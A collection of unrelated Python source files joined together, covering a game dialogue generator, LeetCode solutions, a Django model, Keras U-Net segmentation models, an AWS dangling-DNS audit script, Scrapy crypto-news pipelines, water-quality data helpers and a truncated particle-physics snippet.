# JOR 05-17-16: THIS WAS THE ORIGINAL FINAL LINE FOR ACTUALLY TOTALLING UP THE SIGNAL SCORES
# BY TALLYING THE ANNOTATIONS FOR EACH NONTERMINAL SYMBOL EXPANDED TO PRODUCE THIS THOUGHT
# self.signals[signal] += strength
def evaluate_runtime_signal(self, signal):
"""Evaluate a runtime signal, e.g., '[id(thinker.boss)]'."""
thinker = self.thinker # Needed to evaluate the signal, if it's truly a runtime signal
try:
return str(eval(signal))
except (NameError, SyntaxError): # It's not a runtime variable, but just a regular string, so return that
return signal
def realize(self):
"""Return a filled-in template according to the world state during the current conversation turn."""
raw_realization = ''.join(element.realize(state=self.thinker) for element in self.template)
return self._postprocess_raw_realization(raw_realization=str(raw_realization))
@staticmethod
def _postprocess_raw_realization(raw_realization):
"""Postprocess a raw thought realization to clean up punctuation and capitalization."""
# postprocessed_realization = ''
# sentence_delimiting_punctuation = {'.', '?', '!'}
# clause_delimiting_punctuation = {',', ';'}
# to_make_uppercase = set()
# to_make_lowercase = set()
# for i, character in enumerate(raw_realization):
# if i == 0 or i in to_make_uppercase:
# postprocessed_realization += character.upper()
# elif i in to_make_lowercase:
# postprocessed_realization += character.lower()
# else:
# postprocessed_realization += character
# if character in sentence_delimiting_punctuation:
# part_of_ellipsis = (
# raw_realization[i] == '.' and
# (i != 0 and raw_realization[i-1] == '.' or
# (i < len(raw_realization)-1 and raw_realization[i+1] == '.')
# )
# )
# # Make sure there's whitespace trailing after this punctuation mark
# if len(raw_realization) > i+1 and raw_realization[i+1] != ' ' and not part_of_ellipsis:
# postprocessed_realization += ' '
# # Make sure the next character after the trailing whitespace is capitalized
# to_make_uppercase.add(i+2)
# elif character in clause_delimiting_punctuation:
# # Make sure there's whitespace trailing after this punctuation mark
# if len(raw_realization) > i+1 and raw_realization[i+1] != ' ':
# postprocessed_realization += ' '
# # Make sure the next character after the trailing whitespace is *not* capitalized
# to_make_lowercase.add(i+2)
# return postprocessed_realization
return raw_realization
def execute(self):
"""Register the effects of this thought on its thinker."""
# Update voltages of the signal receptors in the thinker's mind (this makes signals
# associated with this thought more salient to the thinker merely by virtue of the thinker
# having thunk this thought)
self.thinker.mind.update_receptor_voltages_and_synapse_weights(voltage_updates=self.signals)
# Execute the literal effects associated with this thought
for effect in self.effects:
effect = eval(effect)
effect(thinker=self.thinker)()
class ProductionistLite(Productionist):
"""A subclass to Productionist that is meant for lightweight generating of arbitrary text with few constraints."""
def __init__(self, game):
"""Initialize a DialogueGenerator object."""
super(ProductionistLite, self).__init__(game)
def target_description_type(self):
"""Attempt to generate a textual description of the given type."""
pass |
# 198. House Robber
# https:#leetcode.com/problems/house-robber/
class Solution:
def rob(self, nums) -> int:
prev, ans = 0, 0
for num in nums:
tmp = ans
ans = max(ans, prev + num)
prev = tmp
return ans
|
'''alien_0={}
alien_0['color']='green'
alien_0['points']=5
alien_0['x-position']=0
alien_0['y_position']=25
alien_0['speed']='medium'
print(alien_0)
del alien_0['points']
print(alien_0)
alien_0={'color':'red','point':'15'}
alien_1={'color':'blue','point':'10'}
alien_2={'color':'yellow','point':'5'}
aliens=[alien_0,alien_1,alien_2]
print(aliens)
aliens=[]
for alien_number in range(30):
new_alien={'color':'yellow','point':'5'}
aliens.append(new_alien)
for alien in aliens[:5]:
print(alien)
'''
favourite_languages={
'mao':['python','rudy'],
'zhu':['c'],
'zhou':['ruby','go'],
'he':['python','haskell'],
}
for name,languages in favourite_languages.items():
if len(languages)==1:
print("\n" + name.title() + "'s favourite languages is:")
else:
print("\n"+name.title()+"'s favourite languages are:")
for language in languages:
print("\t"+language.title())
|
from django.db import models
# Create your models here.
class MaterialInfo(models.Model):
MaterialName = models.CharField(max_length=30, null=False)
maker = models.CharField(max_length=30)
category = models.CharField(max_length=20)
ChemName = models.CharField(max_length=200)
TechInfo = models.TextField(max_length=1000)
# TechLink = models.URLField('Site URL')
# Attach = models.FileField
def __str__(self):
return self.MaterialName + " / " + self.maker
|
from tensorflow.keras.layers import Input, Conv2D, Conv2DTranspose, BatchNormalization, Activation, Dropout
from tensorflow.keras.applications import DenseNet121
import tensorflow as tf
def unet_model(input_tensor):
# contraction 1§l
conv_1_1 = Conv2D(filters=32, kernel_size=(3, 3), padding="same", name="conv_1_1")(input_tensor)
activ_1_1 = Activation("relu")(BatchNormalization()(conv_1_1))
conv_1_2 = Conv2D(filters=32, kernel_size=(3, 3), padding="same", name="conv_1_2")(activ_1_1)
activ_1_2 = Activation("relu")(BatchNormalization()(conv_1_2))
conv_1_3 = Conv2D(filters=32, kernel_size=(2, 2), strides=(2, 2), padding="same", name="conv_1_3")(activ_1_2)
activ_1_3 = Activation("relu")(BatchNormalization()(conv_1_3))
activ_1_3 = Dropout(0.25)(activ_1_3)
# (?, 256, 256, 32)
# contraction 2
conv_2_1 = Conv2D(filters=64, kernel_size=(3, 3), padding="same", name="conv_2_1")(activ_1_3)
activ_2_1 = Activation("relu")(BatchNormalization()(conv_2_1))
conv_2_2 = Conv2D(filters=64, kernel_size=(3, 3), padding="same", name="conv_2_2")(activ_2_1)
activ_2_2 = Activation("relu")(BatchNormalization()(conv_2_2))
conv_2_3 = Conv2D(filters=64, kernel_size=(2, 2), strides=(2, 2), padding="same", name="conv_2_3")(activ_2_2)
activ_2_3 = Activation("relu")(BatchNormalization()(conv_2_3))
activ_2_3 = Dropout(0.5)(activ_2_3)
# (?, 128, 128, 64)
# contraction 3
conv_3_1 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", name="conv_3_1")(activ_2_3)
activ_3_1 = Activation("relu")(BatchNormalization()(conv_3_1))
conv_3_2 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", name="conv_3_2")(activ_3_1)
activ_3_2 = Activation("relu")(BatchNormalization()(conv_3_2))
conv_3_3 = Conv2D(filters=128, kernel_size=(2, 2), strides=(2, 2), padding="same", name="conv_3_3")(activ_3_2)
activ_3_3 = Activation("relu")(BatchNormalization()(conv_3_3))
activ_3_3 = Dropout(0.5)(activ_3_3)
# (?, 64, 64, 128)
# contraction 4
conv_4_1 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", name="conv_4_1")(activ_3_3)
activ_4_1 = Activation("relu")(BatchNormalization()(conv_4_1))
conv_4_2 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", name="conv_4_2")(activ_4_1)
activ_4_2 = Activation("relu")(BatchNormalization()(conv_4_2))
conv_4_3 = Conv2D(filters=256, kernel_size=(2, 2), strides=(2, 2), padding="same", name="conv_4_3")(activ_4_2)
activ_4_3 = Activation("relu")(BatchNormalization()(conv_4_3))
activ_4_3 = Dropout(0.5)(activ_4_3)
# (?, 32, 32, 256)
# bottom
conv_5_1 = Conv2D(filters=512, kernel_size=(3, 3), padding="same", name="conv_5_1")(activ_4_3)
activ_5_1 = Activation("relu")(BatchNormalization()(conv_5_1))
conv_5_2 = Conv2D(filters=512, kernel_size=(3, 3), padding="same", name="conv_5_2")(
activ_5_1)
activ_5_2 = Activation("relu")(BatchNormalization()(conv_5_2))
# (?, 32, 32, 512)
# expansion 1
upconv_6_1 = Conv2DTranspose(filters=256, kernel_size = (2, 2), strides = (2, 2), padding = "same", name = "upconv_6_1")(activ_5_2)
upactiv_6_1 = Activation("relu")(BatchNormalization()(upconv_6_1))
concat_6 = tf.concat(values=[activ_4_2, upactiv_6_1], axis=-1, name='concat_6')
concat_6 = Dropout(0.5)(concat_6)
conv_6_1 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", name="conv_6_1")(concat_6)
activ_6_1 = Activation("relu")(BatchNormalization()(conv_6_1))
conv_6_2 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", name="conv_6_2")(
activ_6_1)
activ_6_2 = Activation("relu")(BatchNormalization()(conv_6_2))
activ_6_2 = Dropout(0.25)(activ_6_2)
# (?, 64, 64, 256)
# expansion 2
upconv_7_1 = Conv2DTranspose(filters=128, kernel_size = (2, 2), strides = (2, 2), padding = "same", name = "upconv_7_1")(activ_6_2)
upactiv_7_1 = Activation("relu")(BatchNormalization()(upconv_7_1))
concat_7 = tf.concat(values=[activ_3_2, upactiv_7_1], axis=-1, name='concat_7')
conv_7_1 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", name="conv_7_1")(concat_7)
activ_7_1 = Activation("relu")(BatchNormalization()(conv_7_1))
conv_7_2 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", name="conv_7_2")(
activ_7_1)
activ_7_2 = Activation("relu")(BatchNormalization()(conv_7_2))
# (?, 128, 128, 128)
# expansion 3
upconv_8_1 = Conv2DTranspose(filters=64, kernel_size=(2, 2), strides=(2, 2), padding="same",
name="upconv_8_1")(activ_7_2)
upactiv_8_1 = Activation("relu")(BatchNormalization()(upconv_8_1))
concat_8 = tf.concat(values=[activ_2_2, upactiv_8_1], axis=-1, name='concat_8')
concat_8 = Dropout(0.5)(concat_8)
conv_8_1 = Conv2D(filters=64, kernel_size=(3, 3), padding="same", name="conv_8_1")(concat_8)
activ_8_1 = Activation("relu")(BatchNormalization()(conv_8_1))
conv_8_2 = Conv2D(filters=64, kernel_size=(3, 3), padding="same", name="conv_8_2")(
activ_8_1)
activ_8_2 = Activation("relu")(BatchNormalization()(conv_8_2))
# (?, 256, 256, 64)
# expansion 4
upconv_9_1 = Conv2DTranspose(filters=32, kernel_size=(2, 2), strides=(2, 2), padding="same",
name="upconv_9_1")(activ_8_2)
upactiv_9_1 = Activation("relu")(BatchNormalization()(upconv_9_1))
concat_9 = tf.concat(values=[activ_1_2, upactiv_9_1], axis=-1, name='concat_9')
conv_9_1 = Conv2D(filters=32, kernel_size=(3, 3), padding="same", name="conv_9_1")(concat_9)
activ_9_1 = Activation("relu")(BatchNormalization()(conv_9_1))
# (?, 512, 512, 32)
# final
conv_10 = Conv2D(filters=1, kernel_size=(1, 1), activation=None, padding="same", name="conv_10")(
activ_9_1)
# (?, 512, 512, 1)
return conv_10
def model_on_steroids_densenet121(input_tensor):
densenet = DenseNet121(include_top=False, input_tensor=input_tensor,
input_shape=(512, 512, 3)) # summarize the model
for layer in densenet.layers:
layer.trainable = True #Or True
# expansion 1
upconv_6_1 = Conv2DTranspose(filters=320, kernel_size=(2, 2), strides=(2, 2), padding="same",
kernel_initializer='he_normal', name="upconv_6_1")(
densenet.layers[-1].output) # (32, 32, 320)
upactiv_6_1 = Activation("relu")(BatchNormalization()(upconv_6_1))
concat_6 = tf.concat(values=[densenet.get_layer("conv4_block24_concat").output, upactiv_6_1], axis=-1, name='concat_6')
concat_6 = Dropout(0.5)(concat_6)
conv_6_1 = Conv2D(filters=320, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_6_1")(concat_6)
activ_6_1 = Activation("relu")(BatchNormalization()(conv_6_1))
conv_6_2 = Conv2D(filters=320, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_6_2")(
activ_6_1)
activ_6_2 = Activation("relu")(BatchNormalization()(conv_6_2))
activ_6_2 = Dropout(0.25)(activ_6_2)
# (?, 32, 32, 320)
# expansion 2
upconv_7_1 = Conv2DTranspose(filters=256, kernel_size=(2, 2), strides=(2, 2), padding="same", kernel_initializer='he_normal', name="upconv_7_1")(
activ_6_2) # (64,64,256)
upactiv_7_1 = Activation("relu")(BatchNormalization()(upconv_7_1))
concat_7 = tf.concat(values=[densenet.get_layer("conv3_block12_concat").output, upactiv_7_1], axis=-1, name='concat_7')
conv_7_1 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_7_1")(concat_7)
activ_7_1 = Activation("relu")(BatchNormalization()(conv_7_1))
conv_7_2 = Conv2D(filters=256, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_7_2")(
activ_7_1)
activ_7_2 = Activation("relu")(BatchNormalization()(conv_7_2))
# (?, 64, 64, 256)
# expansion 3
upconv_8_1 = Conv2DTranspose(filters=128, kernel_size=(2, 2), strides=(2, 2), padding="same", kernel_initializer='he_normal',
name="upconv_8_1")(activ_7_2) # (128, 128, 256)
upactiv_8_1 = Activation("relu")(BatchNormalization()(upconv_8_1))
concat_8 = tf.concat(values=[densenet.get_layer("conv2_block6_concat").output, upactiv_8_1], axis=-1, name='concat_8')
concat_8 = Dropout(0.5)(concat_8)
conv_8_1 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_8_1")(concat_8)
activ_8_1 = Activation("relu")(BatchNormalization()(conv_8_1))
conv_8_2 = Conv2D(filters=128, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_8_2")(
activ_8_1)
activ_8_2 = Activation("relu")(BatchNormalization()(conv_8_2))
# (?, 128, 128, 128)
# expansion 4
upconv_9_1 = Conv2DTranspose(filters=96, kernel_size=(2, 2), strides=(2, 2), padding="same", kernel_initializer='he_normal',
name="upconv_9_1")(activ_8_2) # (256, 256, 64)
upactiv_9_1 = Activation("relu")(BatchNormalization()(upconv_9_1))
concat_9 = tf.concat(values=[densenet.get_layer("conv1/relu").output, upactiv_9_1], axis=-1, name='concat_9')
concat_9 = Dropout(0.5)(concat_9)
conv_9_1 = Conv2D(filters=96, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_9_1")(concat_9)
activ_9_1 = Activation("relu")(BatchNormalization()(conv_9_1))
conv_9_2 = Conv2D(filters=96, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_9_2")(
activ_9_1)
activ_9_2 = Activation("relu")(BatchNormalization()(conv_9_2))
# (?, 256, 256, 96)
# expansion 5
upconv_10_1 = Conv2DTranspose(filters=64, kernel_size=(2, 2), strides=(2, 2), padding="same", kernel_initializer='he_normal', # ou filters = 32 ?
name="upconv_10_1")(activ_9_2) # (512, 512, 64)
upactiv_10_1 = Activation("relu")(BatchNormalization()(upconv_10_1))
conv_10_1 = Conv2D(filters=64, kernel_size=(3, 3), padding="same", kernel_initializer='he_normal', name="conv_10_1")(upactiv_10_1)
activ_10_1 = Activation("relu")(BatchNormalization()(conv_10_1))
# (?, 512, 512, 64)
# final
conv_10 = Conv2D(filters=1, kernel_size=(1, 1), activation=None, name="conv_10")(
activ_10_1)
# (?, 512, 512, 1)
return conv_10
|
import boto3
from collections import defaultdict
from pprint import pprint
r53 = boto3.client('route53')
ec2 = boto3.client('ec2')
s3 = boto3.client('s3')
dangling_resources = defaultdict()
s3_all_buckets = s3.list_buckets()
r53_zone = r53.list_hosted_zones()
def ec2_info(ipaddress,record_name):
try:
instance_info = ec2.describe_instances(Filters=[{
'Name': 'ip-address',
'Values': [ipaddress],},],)
#Check for a value associated with an EC2 instance
#If value doesn't exist exit the try
exists = instance_info['Reservations'][0]['Instances'][0]['ImageId']
except IndexError:
dangling_resources[ipaddress] = {
'record': ipaddress,
'DNS': record_name
}
def s3_info(bucketName,s3dns):
if bucketName not in s3_all_buckets:
dangling_resources[bucketName] = {
'record': bucketName,
'DNS': s3dns
}
for zones in r53_zone['HostedZones']:
zoneID = zones['Id'].replace('/hostedzone/', '')
zoneName = zones['Name']
#Get list of resources for zoneName
r53_records = r53.list_resource_record_sets(HostedZoneId=zoneID,)
for records in r53_records['ResourceRecordSets']:
#Filter out non 'A' records
if records['Type'] == 'A':
if records.get('AliasTarget') is not None:
#Set DNS entry for given record
s3dns = records['AliasTarget']['DNSName']
#Records with cloudfront indicating an S3 bucket hosting content
if 'cloudfront' in s3dns:
bucketname = records['Name']
#Call s3_info with bucketname from associated DNS record
s3_info(bucketname,s3dns)
#Filter out infrastructure hosted outside AWS, based on record name
if records['Name'] != '[INTERNAL_RESOURCE_NAME]' + zoneName:
try:
for elastic_ips in records['ResourceRecords']:
#Set EIP
ipaddr = elastic_ips['Value']
#Set DNS name
dns_name = records['Name']
#Filter infrastructure hosted outside AWS, based on IP
if '[INTERNAL_RESOURCE_IPs]' not in ipaddr:
#Call ec2_info with EIP and DNS name
ec2_info(ipaddr,dns_name)
except KeyError:
continue
for records in dangling_resources:
print(dangling_resources[records])
|
class Solution:
# @param {string} s
# @param {string[]} words
# @return {integer[]}
def findSubstring(self, s, words):
if not s or not words or not words[0]:
return []
wordDic, sDic = {}, {}
for item in words:
if item not in wordDic.keys():
wordDic[item] = 1
else:
wordDic[item] += 1
ret = []
wordLen = len(words[0])
sLen = len(s)
for i in range(wordLen):
left = i
count = 0
sDic.clear()
for j in range(i, sLen, wordLen):
word = s[j:j+wordLen]
if word in wordDic.keys():
if word not in sDic.keys():
sDic[word] = 1
else:
sDic[word] += 1
if sDic[word] <= wordDic[word]:
count += 1
else:
while s[left:left+wordLen] != word:
tmpWord = s[left:left+wordLen]
sDic[tmpWord] -= 1
if sDic[tmpWord] == 0:
del sDic[tmpWord]
count -= 1
left += wordLen
left += wordLen
sDic[word] -= 1
else:
sDic.clear()
count = 0
left = j + wordLen
if count == len(words):
ret.append(left)
sDic[s[left:left+wordLen]] -= 1
if sDic[s[left:left+wordLen]] == 0:
del sDic[s[left:left+wordLen]]
left += wordLen
count -= 1
return ret
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.exceptions import DropItem
import pymongo
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from crawlers.misc import lm_positive, lm_negative
class CrawlersPipeline(object):
def process_item(self, item, spider):
return item
class StatusPipeLine(object):
def process_item(self, item, spider):
if item.get('status') == 1:
return item
else:
if item.get('status') == 0:
raise DropItem("Couldn't fetch item because of response status: %d" % item.get('status'))
else:
raise DropItem("Couldn't crawl the new with id because it doesn't follow the known structure")
class DuplicatePipeLine(object):
collection_name = "coin_telegraph_news"
def __init__(self, mongo_uri, mongo_db):
self.mongo_uri = mongo_uri
self.mongo_db = mongo_db
@classmethod
def from_crawler(cls,crawler):
return cls(
mongo_uri = crawler.settings.get("MONGO_URI"),
mongo_db = crawler.settings.get("MONGO_DATABASE", 'items')
)
def open_spider(self,spider):
#connect to database
self.client = pymongo.MongoClient(self.mongo_uri)
self.db = self.client[self.mongo_db]
self.coin_telegraph_collection = self.db[self.collection_name]
def close_spider(self, spider):
self.client.close()
def process_item(self,item,spider):
#check if the item was retrieved correctly
if self.coin_telegraph_collection.count_documents({"id_new" : item.get("id_new")}) == 0:
return item
else:
raise DropItem("Item with id %d already exists" % item.get('id_new'))
class ProcessItemPipeLine(object):
def open_spider(self,spider):
#initialize sentiment analyzer
self.analyzer = SentimentIntensityAnalyzer()
self.analyzer.lexicon.update(lm_positive)
self.analyzer.lexicon.update(lm_negative)
def process_item(self,item,spider):
item['analysis'] = "Price Analysis" in item.get('title')
#add column tags
item['btc'] = "#Bitcoin News" in item.get('tags') or "#Bitcoin" in item.get('tags')
item['ltc'] = "#Litecoin News" in item.get('tags') or "#Litecoin" in item.get('tags')
item['eth'] = "#Ethereum News" in item.get('tags') or "#Ethereum" in item.get('tags')
item['xrp'] = "#Ripple News" in item.get('tags') or "#Ripple" in item.get('tags')
if not (item['btc'] or item['ltc'] or item['eth'] or item['xrp']):
raise DropItem("Item with id %d is not related to any currency" % item.get('id_new'))
#add sentiment
if item["analysis"] == True:
pass #TODO
else:
compounds = []
for paragraph in item["content"]:
comp = self.analyzer.polarity_scores(paragraph)["compound"]
if comp != 0.0:
compounds.append(comp)
if len(compounds) != 0:
item["sent_comp"] = sum(compounds)/len(compounds)
else:
item["sent_comp"] = 0
return item
class MongoDBPipeLine(object):
collection_name = "coin_telegraph_news"
def __init__(self, mongo_uri, mongo_db):
self.mongo_uri = mongo_uri
self.mongo_db = mongo_db
@classmethod
def from_crawler(cls,crawler):
return cls(
mongo_uri = crawler.settings.get("MONGO_URI"),
mongo_db = crawler.settings.get("MONGO_DATABASE", 'items')
)
def open_spider(self,spider):
#connect to database
self.client = pymongo.MongoClient(self.mongo_uri)
self.db = self.client[self.mongo_db]
self.coin_telegraph_collection = self.db[self.collection_name]
def close_spider(self, spider):
self.client.close()
def process_item(self,item,spider):
self.coin_telegraph_collection.insert_one(dict(item))
return item
|
import isbnlib
import isbnlib._exceptions as exceptions
import isbnlib.dev._exceptions as goob_exceptions
def getBookData(isbn13):
try:
data = isbnlib.meta(str(isbn13), service='goob')
except goob_exceptions.NoDataForSelectorError:
# Google books not working
try:
data_open = isbnlib.meta(str(isbn13))
data = data_open
except exceptions.NotValidISBNError:
return False
return False
authorstring = ', '.join(data['Authors'])
name = data['Title']
author = authorstring
isbn13 = data['ISBN-13']
return [name, author, isbn13]
|
## MIT License
##
## Copyright (c) 2021 conveen
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
import typing
from hare.core.management.subprocess_command import SubprocessCommand
from hare.conf.settings import BASE_DIR
class Command(SubprocessCommand):
help = "Run Pylint code linter."
program = "pylint"
def run_subprocess(
self,
command_extra_args: typing.List[str],
source_paths: typing.List[str],
**subprocess_kwargs,
) -> None:
pylintrc_path = f"{BASE_DIR.parent.joinpath('pylintrc')}"
command_extra_args = [
"--rcfile",
pylintrc_path,
"--load-plugins",
"pylint_django",
] + command_extra_args
super().run_subprocess(command_extra_args, source_paths)
|
#print(f"Hello world {variable}")
def check(story):
rude_words = ["feo", "chiquito", "hola", "que", "hace"]
with open("my_story.txt") as my_story:
contents = my_mystory.read()
rude_count = 0
for rude in rude_words:
if rude in contents:
rude_count += 1
print(f"found rude word: {rude}")
if rude_count == 0:
print("Congratulations, your file has no rude words.")
print("At least, no rude words I know.")
else:
print(f"you have {rude_count} rude words")
if __name__ == '__main__':
check("my_story.txt")
|
import pandas as pd
import numpy as np
def fetch_time(df, key):
"""
Identity, for time itself only?
t1 x1
t2 x2
t3 x3
->
t1 x1
t2 x3
t3 x3
"""
return df[key].to_numpy()
def fetch_diff(df, key):
"""
For accumulative quantities
t1 x1
t2 x2
t3 x3
->
t1 x2-x1
t2 x3-x2
"""
return df[key].diff(1).shift(-1).dropna().to_numpy()
def fetch_roll(df, key):
"""
For timestamp encoding, use middle value as approximation for that interval.
t1 x1
t2 x2
t3 x3
->
t1 (x1+x2)/2
t2 (x2+x3)/2
"""
return df[key].rolling(2).mean().shift(-1).dropna().to_numpy()
def fetch_skip(df, key):
"""
For sparse encoding but "uniform":
t1 x1
t2 x1
t2 x2
t3 x2
->
t1 x1
t2 x2
"""
return df[key][::2].to_numpy()
def fluctuation_smooth(seq: np.ndarray):
"""
The model sometime give [high, 0] sequence due to so called numerical problem when water is too "enough".
However, the de-fluctuation "true" value may be interesting for decision alogrithom,
thus this function try to give an approximation by smoothing like:
0.2, 0.3, 0.8, 0.0, 1.2, 0.0, ...
->
0.2, 0.3, 0.4, 0.5, 0.6, 0.7, ...
Note: This pattern may fail for right
"""
idx0 = np.where(seq == 0)[0]
if len(idx0) == 0:
return
if idx0[0] == 0:
idx0 = idx0[1:]
idxp = idx0 - 1
smoothed = (seq[idx0] + seq[idxp]) / 2
seq[idx0] = seq[idxp] = smoothed
return seq
def get_aligned_dict(data_map, df_node_map_map, df_map_map, out_map=None, *, wq_keys=None, aser_keys=None,
smooth_wqpsc_inp=True, drop_WQWCTS_OUT_obsession_edge_int=True):
"""
out_map is the output of run and optional.
"""
if wq_keys is None:
wq_keys = ["ROP"]
if aser_keys is None:
aser_keys = ["rain"]
aligned_dict = {}
# aligned_dict["time"] = fetch_time(out_map["qbal.out"], "jday")
aligned_dict["time"] = fetch_time(data_map["aser.inp"], "time")
if out_map is not None:
aligned_dict["flow_qctlo"] = - fetch_diff(out_map["qbal.out"], "qctlo(million-m3)") * 1_000_000 # million-m3 -> m3
aligned_dict["elev"] = fetch_roll(out_map["qbal.out"], "elev(m)")
gb = out_map["WQWCTS.OUT"].groupby(["I", "J", "K"])
wq_ij_map = dict(tuple(gb))
if drop_WQWCTS_OUT_obsession_edge_int:
wq_ij_map = {key: drop_obsession_edge_int(value, "TIME") for key, value in wq_ij_map.items()}
for wq_key in wq_keys:
for ij_tuple in wq_ij_map:
key = f"{wq_key}_{ij_tuple}"
aligned_dict[key] = fetch_roll(wq_ij_map[ij_tuple], wq_key)
for wq_key in wq_keys:
for flow_key, df in df_map_map["wqpsc.inp"].items():
key = f"{wq_key}_{flow_key}"
seq = fetch_skip(df, wq_key)
if smooth_wqpsc_inp:
fluctuation_smooth(seq)
aligned_dict[key] = seq
for key, df in df_map_map["qser.inp"].items():
key = f"flow_{key}"
aligned_dict[key] = fetch_skip(df, "flow") * 3600 # m3/s -> m3/h
for aser_key in aser_keys:
aligned_dict[aser_key] = fetch_roll(data_map["aser.inp"], aser_key)
return aligned_dict
def get_aligned_df(data_map, df_node_map_map, df_map_map, out_map=None, **kwargs):
"""
This function itself may modify data supplied in, so is not a pure "view".
"""
aligned_dict = get_aligned_dict(data_map, df_node_map_map, df_map_map, out_map, **kwargs)
min_length = min([len(arr) for arr in aligned_dict.values()])
aligned_dict = {key: value[:min_length] for key, value in aligned_dict.items()}
aligned_df = pd.DataFrame(aligned_dict)
return aligned_df
def stats_load(df, df_ori, wq_key, flow_key_list, qctlo_key="qctlo", pump_key="pump_outflow"):
"""
df_ori should has un-modified qser.
"""
dd = {}
dd[f"load_{qctlo_key}"] = df[f"{wq_key}_{qctlo_key}"] * df[f"flow_{qctlo_key}"]
for flow_key in flow_key_list:
diff = df_ori[f"flow_{flow_key}"] - df[f"flow_{flow_key}"]
dd[f"load_{flow_key}"] = df[f"{wq_key}_{flow_key}"] * diff
dd[f"load_{pump_key}"] = df[f"flow_{pump_key}"] * df[f"{wq_key}_{pump_key}"]
rdf = pd.DataFrame(dd)
rdf["load_flow"] = rdf[[f"load_{flow_key}" for flow_key in flow_key_list]].sum(axis=1)
rdf["load_total"] = rdf[f"load_{qctlo_key}"] + rdf["load_flow"] + rdf[f"load_{pump_key}"]
return rdf
def append_out_map_direct(out_map1, out_map2):
rd = {}
for key in out_map1:
df: pd.DataFrame = out_map1[key].append(out_map2[key])
rd[key] = df.reset_index(drop=True)
return rd
obsession_detect_threshold = 1 / 24 / 2
def drop_obsession_edge_int(df: pd.DataFrame, time_key, cut_head=False, cut_tail=False):
"""
0.0, 0.00024, 0.04187, ..., 0.95850, 1.00024, ..., 1.95850, 1.99976, 2.00000
->
0.00024, 0.04187, ..., 0.95850, 1.00024, ..., 1.95850, 1.99976
"""
while abs(df[time_key].iloc[1] - df[time_key].iloc[0]) < obsession_detect_threshold:
df = df.iloc[1:]
if cut_head:
df = df.iloc[1:]
while abs(df[time_key].iloc[-1] - df[time_key].iloc[-2]) < obsession_detect_threshold:
df = df.iloc[:-1]
if cut_tail:
df = df.iloc[:-1]
return df
def drop_obsession_WQCTS_out(df, **kwargs):
"""
groupby.apply will modify whole order of df, while it doesn't matter for in-group-only usage.
"""
return df.groupby(["I", "J", "K"]).apply(lambda _df: drop_obsession_edge_int(_df, "TIME", **kwargs)).\
reset_index(level=[0,1,2], drop=True).sort_index()
def append_WQWCTS_OUT(df1: pd.DataFrame, df2: pd.DataFrame):
df1 = drop_obsession_WQCTS_out(df1, cut_tail=True)
# cut_tail=True => ..., 0.99976, 1.00024, ... -> ..., 1.00024, ...
df2 = drop_obsession_WQCTS_out(df2)
return df1.append(df2).reset_index(drop=True)
def append_qbal_out(df1: pd.DataFrame, df2: pd.DataFrame):
# TODO, It's impossible to "recover" whole sequence according to current output format if we don't charge extra computation.
# qbal output format: 0-0, 0-1, 0-2, ..., 0-23. How can we get result of 23-24 if we don't have 0-24?
# Fine, someone sugguest their workaround at this time is an extra run with one more day to fetch the result...
raise NotImplementedError
def append_out_map(out_map1, out_map2):
# TODO: since "exact" append_qbal_out is impossible to implement at this time, is it useful to implement a approximated version to help pipeline?
append_map = {"qbal.out": append_qbal_out, "WQWCTS.OUT": append_WQWCTS_OUT}
return {key: append(out_map1[key], out_map2[key]) for key, append in append_map.items()}
|
import ROOT
from ROOT import TLorentzVector
def lepHasOverlap(Chain, index, isGen = False):
#Check the flavor of the lepton and initialize variables
hasOverlap = False
inputVec = TLorentzVector()
inputVec.SetPtEtaPhiE(Chain._lPt[index], Chain._lEta[index], Chain._lPhi[index], Chain._lE[index])
#Loop over all leptons with a different flavor
for l in xrange(ord(Chain._nL)):
if l == index or Chain._lFlavor[l] == Chain._lFlavor[index]: continue
if not Chain._lPOGLoose[l]: continue
lVec = TLorentzVector()
lVec.SetPtEtaPhiE(Chain._lPt[l], Chain._lEta[l], Chain._lPhi[l], Chain._lE[l])
dR = inputVec.DeltaR(lVec)
if dR < .4: hasOverlap = True
return hasOverlap
def matchHasOverlap(Chain, index): #Only works for taus at the moment
hasOverlap = False
inputVec = TLorentzVector()
inputVec.SetPtEtaPhiE(Chain._lMatchPt[index], Chain._lMatchEta[index], Chain._lMatchPhi[index], Chain._lMatchE[index])
for l in xrange(ord(Chain._gen_nL)):
if l == index or Chain._gen_lFlavor == 2: continue
